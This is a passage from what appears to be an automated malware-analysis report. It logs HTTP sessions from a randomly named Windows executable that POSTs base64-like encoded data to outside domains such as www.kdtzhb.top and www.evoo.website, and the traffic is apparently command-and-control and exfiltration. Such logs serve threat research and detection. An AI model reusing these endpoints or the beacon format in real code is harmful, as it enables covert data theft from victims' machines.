                                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  18192.168.2.54999747.242.89.146804068C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Nov 14, 2024 15:40:53.125857115 CET650OUTPOST /1iqa/ HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  Content-Length: 228
                                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                                  Connection: close
                                                                                                                                                  Host: www.kdtzhb.top
                                                                                                                                                  Origin: http://www.kdtzhb.top
                                                                                                                                                  Referer: http://www.kdtzhb.top/1iqa/
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                                  Data Raw: 57 36 33 38 62 34 55 3d 4a 4b 77 4a 39 41 53 68 76 53 65 41 47 5a 78 2f 75 49 58 55 6c 57 41 67 56 33 35 45 35 71 36 41 36 71 35 4c 77 6a 41 32 51 6b 49 4f 63 47 64 45 44 52 75 64 49 6c 6c 6d 58 6c 51 63 33 78 69 35 59 55 4e 72 79 6d 76 34 4f 4f 39 46 56 51 56 62 61 4a 6f 4d 73 33 32 2b 33 62 66 6b 68 32 53 34 34 61 46 67 39 73 4d 6a 59 75 62 78 4f 65 61 2f 58 35 52 70 37 72 33 30 43 33 57 32 53 70 4f 54 4b 56 39 2b 50 64 2f 6f 45 46 50 37 69 6f 5a 49 79 36 49 4d 76 50 59 4c 6e 68 55 72 33 36 54 74 57 4f 33 56 47 48 44 77 63 6c 32 74 6f 30 70 6f 7a 66 4e 76 4b 54 31 57 31 31 61 69 72 2f 73 56 5a 64 31 79 2b 41 69 47 36 4a 6e 2b 4b 6a 31 4a 4a 46 44 5a 2b 6d 52 68 6b 34 48 61
                                                                                                                                                  Data Ascii: W638b4U=JKwJ9AShvSeAGZx/uIXUlWAgV35E5q6A6q5LwjA2QkIOcGdEDRudIllmXlQc3xi5YUNrymv4OO9FVQVbaJoMs32+3bfkh2S44aFg9sMjYubxOea/X5Rp7r30C3W2SpOTKV9+Pd/oEFP7ioZIy6IMvPYLnhUr36TtWO3VGHDwcl2to0pozfNvKT1W11air/sVZd1y+AiG6Jn+Kj1JJFDZ+mRhk4Ha
                                                                                                                                                  Nov 14, 2024 15:40:54.075934887 CET691INHTTP/1.1 404 Not Found
                                                                                                                                                  Server: nginx
                                                                                                                                                  Date: Thu, 14 Nov 2024 14:40:53 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Content-Length: 548
                                                                                                                                                  Connection: close
                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  19192.168.2.54999847.242.89.146804068C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Nov 14, 2024 15:40:55.679090023 CET1667OUTPOST /1iqa/ HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  Content-Length: 1244
                                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                                  Connection: close
                                                                                                                                                  Host: www.kdtzhb.top
                                                                                                                                                  Origin: http://www.kdtzhb.top
                                                                                                                                                  Referer: http://www.kdtzhb.top/1iqa/
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                                  Data Raw: 57 36 33 38 62 34 55 3d 4a 4b 77 4a 39 41 53 68 76 53 65 41 47 5a 78 2f 75 49 58 55 6c 57 41 67 56 33 35 45 35 71 36 41 36 71 35 4c 77 6a 41 32 51 6b 41 4f 62 30 46 45 5a 7a 47 64 61 56 6c 6d 4c 56 51 5a 33 78 69 65 59 51 5a 76 79 6d 6a 43 4f 4e 46 46 56 79 4e 62 53 59 6f 4d 6d 33 32 2b 2b 37 66 70 73 57 53 58 34 61 31 6b 39 74 38 6a 59 75 62 78 4f 59 65 2f 51 71 4a 70 39 72 33 7a 4b 58 57 79 59 4a 50 30 4b 56 6c 75 50 63 76 34 44 31 76 37 69 4c 68 49 77 4a 67 4d 74 76 59 4a 72 42 55 7a 33 36 66 32 57 4f 72 5a 47 45 66 65 63 69 43 74 37 42 59 44 6f 50 46 75 66 44 51 37 37 46 32 67 33 6f 55 31 55 65 35 62 33 7a 53 6c 35 4d 65 58 4e 6d 41 4a 47 47 47 63 67 6a 64 6e 30 39 53 73 38 76 2b 6c 71 78 44 2b 55 66 39 66 4f 74 55 41 6b 31 41 2b 79 36 56 4f 4c 4f 76 2f 30 42 6b 71 65 33 73 35 65 36 33 4a 44 6a 2f 37 53 55 45 77 6f 74 58 49 54 72 6c 4c 4e 71 6d 64 73 50 34 52 4a 30 37 53 71 77 39 37 6e 48 30 63 59 73 32 4e 6b 4e 68 32 33 73 2b 64 5a 30 56 4a 75 51 69 4a 71 4f 6c 55 4e 72 38 64 47 68 42 51 54 61 [TRUNCATED]
                                                                                                                                                  Data Ascii: W638b4U=JKwJ9AShvSeAGZx/uIXUlWAgV35E5q6A6q5LwjA2QkAOb0FEZzGdaVlmLVQZ3xieYQZvymjCONFFVyNbSYoMm32++7fpsWSX4a1k9t8jYubxOYe/QqJp9r3zKXWyYJP0KVluPcv4D1v7iLhIwJgMtvYJrBUz36f2WOrZGEfeciCt7BYDoPFufDQ77F2g3oU1Ue5b3zSl5MeXNmAJGGGcgjdn09Ss8v+lqxD+Uf9fOtUAk1A+y6VOLOv/0Bkqe3s5e63JDj/7SUEwotXITrlLNqmdsP4RJ07Sqw97nH0cYs2NkNh23s+dZ0VJuQiJqOlUNr8dGhBQTap5L/AleWCYSCQkSLC2Snpofx3fO9lFuxclnF8FKgU7p8Q5+K7lwsp1UZ/XkAGOqHc+QBistn/lNoCo3Dde718lf+uN0Uc8C3sKeiX6x7Zc7xkA1DhVS/vJhEmGC2N0h8K5MXwtvRZOyyvw8BWrU8AI7Wi2tlpp1FEwluZQ/6ll8uKPBkMr9Wv4Br1VoW2B6jUgEZ0r3+ozOjXP0H/XVng7tvAQDy46pqGZ3CeUOCYBYfAuipq00TzCy636mKIVyoJAPO9AcZvexTQ0Tw5Wzp3fYaJfc3EkiJPufFdBIj7VKwk1TKKtdxFVGI/nIkcxTabEt5BgNcj0CwN5ZVKdDhsbElTKXZzsClTZSAMPRO0UtNHLKmFYx903eQI+keY4xYEXFEPhQebw8Fc/M9kOWHG14SssdJjsATtPPIB4W5qFYxh35/LPzxr64ZeNDdf7KFdOfztfLVXXXNmMGITJTNdYFJ5mBKlufc8ihm2ZI4XIJ6nxCvWLWVC6791nliuZ6co/uXFBWs6U7QrarEpcFFxHsFDgCOcpnQHP/P6u4Ek91pogV+BMouMUiimVdRQ0bY4GECPrvYrT3ADc2qD/c1pIif+3Rfbc62Qf8S+xsXHSkFkDD7dLkKy3ayoFjX6zA5WkLCThvIpAMlVFGhAgjRCe3yyEtgbgpfs8 [TRUNCATED]
                                                                                                                                                  Nov 14, 2024 15:40:56.647399902 CET691INHTTP/1.1 404 Not Found
                                                                                                                                                  Server: nginx
                                                                                                                                                  Date: Thu, 14 Nov 2024 14:40:56 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Content-Length: 548
                                                                                                                                                  Connection: close
                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  20192.168.2.54999947.242.89.146804068C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Nov 14, 2024 15:40:58.223109007 CET379OUTGET /1iqa/?W638b4U=EIYp+2qno3OyA6JRko7EkEQRXSdht8qBodEq6zBYd0MwR3tzbR3TIlddc30TsymXBRZ2l1bBHfxTXhxkRZRQjSyqzKDi3Wbpu+VrwdU4dvabDPmYf5pusJWuBQDberj5Ig==&Xll=50hLc0Hhy HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                  Connection: close
                                                                                                                                                  Host: www.kdtzhb.top
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                                  Nov 14, 2024 15:40:59.211580992 CET691INHTTP/1.1 404 Not Found
                                                                                                                                                  Server: nginx
                                                                                                                                                  Date: Thu, 14 Nov 2024 14:40:59 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Content-Length: 548
                                                                                                                                                  Connection: close
                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  21192.168.2.550000128.65.195.180804068C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Nov 14, 2024 15:41:04.457319021 CET636OUTPOST /293d/ HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  Content-Length: 208
                                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                                  Connection: close
                                                                                                                                                  Host: www.evoo.website
                                                                                                                                                  Origin: http://www.evoo.website
                                                                                                                                                  Referer: http://www.evoo.website/293d/
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                                  Data Raw: 57 36 33 38 62 34 55 3d 32 5a 6d 7a 6b 4d 49 4e 54 59 61 61 4b 2b 4a 34 44 4b 44 4f 32 6b 4c 74 36 69 39 51 65 73 64 78 33 45 4b 49 52 46 62 41 4d 32 79 42 77 61 4e 6f 6c 42 39 4e 46 41 59 78 6f 37 6e 57 38 38 35 76 59 43 69 66 50 35 73 59 4c 7a 50 34 48 51 37 30 4d 76 7a 44 57 4b 59 33 31 72 44 76 55 78 71 4e 62 4b 63 4e 53 69 70 6f 44 64 65 4a 6c 45 5a 71 6f 51 75 51 6d 6c 54 46 70 73 49 63 6c 69 49 65 30 42 4d 41 37 75 67 79 45 67 45 44 34 74 64 4d 70 67 42 48 66 51 61 46 6e 4d 50 69 49 69 38 34 32 76 34 4e 4a 30 79 52 74 4b 7a 76 62 2b 51 33 49 43 52 6f 4f 6c 4b 6c 2f 31 7a 48 78 33 6f 79 4a 57 74 36 70 58 30 3d
                                                                                                                                                  Data Ascii: W638b4U=2ZmzkMINTYaaK+J4DKDO2kLt6i9Qesdx3EKIRFbAM2yBwaNolB9NFAYxo7nW885vYCifP5sYLzP4HQ70MvzDWKY31rDvUxqNbKcNSipoDdeJlEZqoQuQmlTFpsIcliIe0BMA7ugyEgED4tdMpgBHfQaFnMPiIi842v4NJ0yRtKzvb+Q3ICRoOlKl/1zHx3oyJWt6pX0=


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  22192.168.2.550001128.65.195.180804068C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Nov 14, 2024 15:41:07.024276972 CET656OUTPOST /293d/ HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  Content-Length: 228
                                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                                  Connection: close
                                                                                                                                                  Host: www.evoo.website
                                                                                                                                                  Origin: http://www.evoo.website
                                                                                                                                                  Referer: http://www.evoo.website/293d/
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                                  Data Raw: 57 36 33 38 62 34 55 3d 32 5a 6d 7a 6b 4d 49 4e 54 59 61 61 46 2b 35 34 41 74 58 4f 2b 6b 4c 71 35 69 39 51 46 63 64 31 33 45 4f 49 52 42 4c 51 50 43 65 42 33 2f 78 6f 33 51 39 4e 45 41 59 78 6a 62 6e 58 7a 63 35 77 59 43 75 58 50 38 4d 59 4c 7a 4c 34 48 56 2f 30 4d 2f 4f 78 58 61 59 31 2b 4c 44 58 4a 68 71 4e 62 4b 63 4e 53 6a 4d 44 44 5a 79 4a 6c 30 70 71 70 30 79 50 72 46 54 61 2f 38 49 63 76 43 49 61 30 42 4e 56 37 73 55 4c 45 69 4d 44 34 73 74 4d 71 31 68 41 52 51 61 44 6a 4d 4f 31 4f 54 42 32 75 76 4d 41 55 57 44 2b 30 4a 53 52 65 49 68 64 53 67 5a 41 64 46 6d 64 76 6d 37 77 67 48 4a 62 54 31 39 4b 33 41 6a 73 46 35 51 2b 74 35 4b 36 31 36 77 54 42 63 51 50 4c 6e 65 54
                                                                                                                                                  Data Ascii: W638b4U=2ZmzkMINTYaaF+54AtXO+kLq5i9QFcd13EOIRBLQPCeB3/xo3Q9NEAYxjbnXzc5wYCuXP8MYLzL4HV/0M/OxXaY1+LDXJhqNbKcNSjMDDZyJl0pqp0yPrFTa/8IcvCIa0BNV7sULEiMD4stMq1hARQaDjMO1OTB2uvMAUWD+0JSReIhdSgZAdFmdvm7wgHJbT19K3AjsF5Q+t5K616wTBcQPLneT


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  23192.168.2.550002128.65.195.180804068C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Nov 14, 2024 15:41:09.579377890 CET1673OUTPOST /293d/ HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  Content-Length: 1244
                                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                                  Connection: close
                                                                                                                                                  Host: www.evoo.website
                                                                                                                                                  Origin: http://www.evoo.website
                                                                                                                                                  Referer: http://www.evoo.website/293d/
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                                  Data Raw: 57 36 33 38 62 34 55 3d 32 5a 6d 7a 6b 4d 49 4e 54 59 61 61 46 2b 35 34 41 74 58 4f 2b 6b 4c 71 35 69 39 51 46 63 64 31 33 45 4f 49 52 42 4c 51 50 43 57 42 33 4e 4a 6f 6c 6a 6c 4e 44 41 59 78 71 37 6e 53 7a 63 34 73 59 42 65 70 50 38 4a 76 4c 78 44 34 56 48 33 30 64 38 57 78 4f 71 59 31 6a 62 44 73 55 78 71 59 62 4a 6b 42 53 69 38 44 44 5a 79 4a 6c 33 78 71 67 41 75 50 34 31 54 46 70 73 49 59 6c 69 49 79 30 46 6f 75 37 73 51 62 45 7a 73 44 34 50 46 4d 72 42 42 41 5a 51 61 42 6d 4d 4f 39 4f 54 4e 39 75 76 67 6d 55 54 58 48 30 4a 71 52 66 35 63 36 47 69 42 67 4c 33 36 36 76 6c 33 69 33 41 45 32 61 6e 68 72 72 33 58 7a 42 49 73 71 6e 2b 4f 61 7a 59 46 69 51 62 52 65 46 51 7a 4e 32 30 59 77 67 53 42 5a 2f 4e 71 2f 35 69 66 4e 49 46 43 6a 42 4b 6d 53 6c 44 78 72 50 4b 6b 79 76 4a 4c 43 4b 36 32 63 62 4d 48 73 6e 37 54 6f 32 6e 54 50 73 77 4e 70 43 4f 79 7a 67 6e 45 79 36 63 4f 72 66 74 69 6d 58 33 50 58 41 57 6c 50 72 6c 51 57 52 38 75 5a 79 6e 42 62 2b 58 50 73 7a 50 70 31 4e 4c 4c 6e 54 37 6b 77 43 78 [TRUNCATED]
                                                                                                                                                  Data Ascii: W638b4U=2ZmzkMINTYaaF+54AtXO+kLq5i9QFcd13EOIRBLQPCWB3NJoljlNDAYxq7nSzc4sYBepP8JvLxD4VH30d8WxOqY1jbDsUxqYbJkBSi8DDZyJl3xqgAuP41TFpsIYliIy0Fou7sQbEzsD4PFMrBBAZQaBmMO9OTN9uvgmUTXH0JqRf5c6GiBgL366vl3i3AE2anhrr3XzBIsqn+OazYFiQbReFQzN20YwgSBZ/Nq/5ifNIFCjBKmSlDxrPKkyvJLCK62cbMHsn7To2nTPswNpCOyzgnEy6cOrftimX3PXAWlPrlQWR8uZynBb+XPszPp1NLLnT7kwCxnM7RC4Ng/pF9q70W4c1bxTRIAYO90zyx3DSDy9vzAPi4MkTmoTdSPL8DtkXpQ0iwf+goSXIn4z5/Rk7/uXwro+3EmJNyCr0ym7uSRX5gsnhXBiuwFoEkC3cfvPDXpJXjlCpBlE8VATrMJ8S16dB3d4nbXSnc9rWjagKTdwkrWG9ZiBQCx9RfPzLIcX7D1T/sBRV61EEyemLmrtqJYN+RLJ+mEcSHM+BMTdRV74dQqliJzhEDoNuP8JYqt3C9mmqbib7jWN4mQszEk4qzxa/EU8pBBF8CzmjI87+BRTXiq9lC2W5zQmb82RcC0EhvzFvikKFHSgf8ZwS3MdAHMtUwLj5NZnkEDK4ahbOj2EAsBxyeCly3kutswG56cciPk7vvtD0NOk7qrlp4xwQCe+LNV9ShMPYCDlMAFGDMb56oYv+/nZ7WiSVXoDR7fV5BFkyzgbYU5yweD0AOCBK2g32vCh3uduoXsraUYyfL7oOWAAEgyrcGPVYMJCOgsX+7GRRyegqOvVAuce0JJuwryvpUY81dt437QL56muwCqvr28UZ9wh94IpXANbwtDQ0RT12xahE0kr4R7LE7OYrsEznO8azr3NAwq4hmwdwWCJebUpMicVxlddJmGqJULXL0Vh0PG7HJdO3nHhRit5XCrsnvsIrvGLiomZ2p6f [TRUNCATED]


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  24192.168.2.550003128.65.195.180804068C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Nov 14, 2024 15:41:12.122459888 CET381OUTGET /293d/?W638b4U=7bOTn4s4CK+jD9JxCOvk7GPe7C1JF/pOmj70YCSuK3OR6e0KuyF5TSw/saz3rP1zPyqrHIRHHBHNYmPna8SGTfIU/JrlV2z9a9IQeyVbD4LqpyZAtBKJ4EaDgMR1jS91tA==&Xll=50hLc0Hhy HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                  Connection: close
                                                                                                                                                  Host: www.evoo.website
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                                  Nov 14, 2024 15:41:17.271413088 CET458INHTTP/1.1 404 Not Found
                                                                                                                                                  Date: Thu, 14 Nov 2024 14:41:17 GMT
                                                                                                                                                  Server: Apache/2.4.25 (Debian)
                                                                                                                                                  Content-Length: 278
                                                                                                                                                  Connection: close
                                                                                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 35 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 65 76 6f 6f 2e 77 65 62 73 69 74 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.25 (Debian) Server at www.evoo.website Port 80</address></body></html>


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  25192.168.2.550004217.70.184.50804068C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Nov 14, 2024 15:41:22.481664896 CET651OUTPOST /vdvc/ HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  Content-Length: 208
                                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                                  Connection: close
                                                                                                                                                  Host: www.astorg-group.info
                                                                                                                                                  Origin: http://www.astorg-group.info
                                                                                                                                                  Referer: http://www.astorg-group.info/vdvc/
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
